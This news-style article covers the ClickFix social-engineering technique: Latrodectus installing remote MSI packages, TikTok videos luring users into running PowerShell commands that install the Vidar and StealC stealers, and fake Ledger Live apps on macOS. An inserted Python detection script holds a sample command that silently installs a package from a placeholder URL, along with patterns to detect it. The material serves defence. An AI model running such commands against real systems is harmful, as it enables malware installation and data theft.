Exploitation of TikTok for Malware Distribution: The Utilization of Vidar and StealC via ClickFix Methodology


The malware known as Latrodectus has recently adopted the ClickFix social engineering technique as a distribution method. The ClickFix approach poses significant risks as it enables malware execution directly in memory, bypassing conventional disk-based detection mechanisms employed by browsers and security tools.

Latrodectus is suspected to be a successor to the IcedID malware and functions primarily as a downloader for additional malicious payloads, including ransomware. First documented in April 2024 by Proofpoint and Team Cymru, Latrodectus has since emerged as a notable threat.

Latrodectus was also among the malware families disrupted by Operation Endgame, a coordinated action that took down 300 servers and neutralized 650 domains linked to various threats, including Bumblebee and QakBot, between May 19 and May 22, 2025.

In the latest observed attacks involving Latrodectus, users are manipulated into copying and executing PowerShell commands sourced from compromised websites, a technique now commonly used for widespread malware distribution. When executed, these commands abuse msiexec.exe to install a package fetched from a remote URL and run it in memory, reducing the chance that security solutions detect it.

The installer bundles a legitimate NVIDIA application that is abused to sideload a malicious DLL, which in turn uses curl to download the primary payload.

To counter these types of threats, security professionals recommend disabling the Windows Run dialog through Group Policy Objects (GPOs) or modifying the Windows Registry to disable the “Windows + R” shortcut.
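Alongside the Run-dialog hardening, the msiexec behaviour described above (a remote URL passed to a silent install, launched from a shell the user was talked into opening) can be hunted for in process-creation telemetry. The following detection logic is an added example and not code from the article or any vendor named in it; the event shape and every path and URL in the sample records are constructed placeholders.

```python
import re

# Constructed process-creation records (parent image + command line), not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "cmd": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"'},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": r"msiexec /i https://update.example.invalid/setup.msi /qn"},
    {"parent": r"C:\Windows\System32\msiexec.exe",
     "cmd": r"msiexec /i C:\Users\alice\Downloads\app.msi"},
    {"parent": r"C:\Windows\explorer.exe",
     "cmd": r"msiexec /x {PLACEHOLDER-PRODUCT-CODE} /quiet"},
]

MSIEXEC = re.compile(r"(?i)(^|\\|\s)msiexec(\.exe)?\b")
INSTALL_SWITCH = re.compile(r"(?i)(^|\s)[/-]i(\s|$)")          # /i = install package
REMOTE_URL = re.compile(r"(?i)\bhttps?://\S+")                   # package fetched over HTTP(S)
QUIET_SWITCH = re.compile(r"(?i)(^|\s)[/-](qn|qb|quiet|q)(\s|$)")  # no UI shown to the user
SHELL_PARENTS = ("powershell", "pwsh", "cmd.exe")


def score_event(event):
    """Return the reasons an event resembles ClickFix-style msiexec abuse (empty if none)."""
    cmd = event["cmd"]
    reasons = []
    if not MSIEXEC.search(cmd):
        return reasons
    if INSTALL_SWITCH.search(cmd) and REMOTE_URL.search(cmd):
        reasons.append("msiexec installing directly from a remote URL")
    if QUIET_SWITCH.search(cmd):
        reasons.append("silent install switch present")
    if any(s in event["parent"].lower() for s in SHELL_PARENTS):
        reasons.append("spawned by an interactive shell (Run-dialog pattern)")
    return reasons


def find_suspicious(events):
    """Alert only on remote-URL installs; the other reasons are attached as context for triage."""
    hits = []
    for event in events:
        reasons = score_event(event)
        if any("remote URL" in r for r in reasons):
            hits.append((event["cmd"], reasons))
    return hits


if __name__ == "__main__":
    for cmd, reasons in find_suspicious(SAMPLE_EVENTS):
        print(cmd, "->", "; ".join(reasons))
```

A local `.msi` path or an uninstall (`/x`) does not fire on its own, which keeps routine software deployment out of the alert queue while still surfacing the remote-package pattern.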

Evolving Techniques in Cyber Threats

Alongside the Latrodectus activity, cybersecurity firm Trend Micro disclosed a new campaign that, instead of luring users with fake CAPTCHA pages, relies on TikTok videos likely generated by artificial intelligence (AI). These videos deliver the Vidar and StealC information stealers by enticing users to execute harmful commands under the pretext of activating Windows, Microsoft Office, CapCut, or Spotify.

These TikTok campaigns have utilized various accounts that have since been deactivated. A notable video, purporting to improve the Spotify experience, reportedly garnered around 500,000 views and significant engagement. This development illustrates the innovative methods attackers employ, manipulating social media trends to disseminate malware.

Cybercriminals are leveraging platforms like TikTok to socially engineer users into executing PowerShell commands. This tactic exemplifies the increasingly sophisticated approaches used to exploit popular platforms for malicious intent.

Compromising Mac Users’ Security

Significant findings also surfaced regarding four distinct malware campaigns utilizing cloned versions of the Ledger Live app to capture sensitive data, such as seed phrases, aiming to drain victims’ cryptocurrency wallets. This malicious activity has persisted since August 2024.

The attacks deploy malicious DMG files that activate AppleScript to gather passwords and Apple Notes data before downloading a compromised version of Ledger Live. When users open this app, they receive false alerts regarding account issues, prompting them to input their recovery seed phrases, which are subsequently sent to an attacker-controlled server.

Moonlock Lab highlighted that these rogue applications utilize macOS stealer malware, such as Atomic macOS Stealer and Odyssey, the latter of which introduced a novel phishing strategy in March 2025. This activity aligns with an ongoing campaign that targets Ledger Live users using PyInstaller-packed binaries.

The increasing discussions surrounding anti-Ledger schemes on dark web forums indicate that cybercriminals are continuously developing new strategies to exploit the trust that crypto owners place in platforms like Ledger Live.